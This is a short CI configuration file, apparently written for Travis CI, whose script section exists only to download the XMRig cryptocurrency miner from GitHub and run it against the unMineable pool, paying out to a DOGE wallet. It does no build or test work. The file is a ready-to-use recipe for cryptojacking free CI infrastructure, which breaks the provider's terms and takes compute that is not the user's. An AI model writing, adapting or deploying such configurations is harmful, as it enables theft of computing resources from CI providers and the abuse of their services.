language: minimal

script:
  - sudo apt update
  - sudo apt install wget tar -y

  # Download XMRig
  - wget https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-x64.tar.gz
  - tar -xvf xmrig-6.21.3-linux-x64.tar.gz
  - cd xmrig-6.21.3

  # Jalankan mining ke Unmineable (DOGE)
  - ./xmrig -a rx -o rx.unmineable.com:443 -u DOGE:DJ3z9tzwpXYtpvnQoc1jxUwkjZ4Bjim12e.github -p x --tls --threads=4
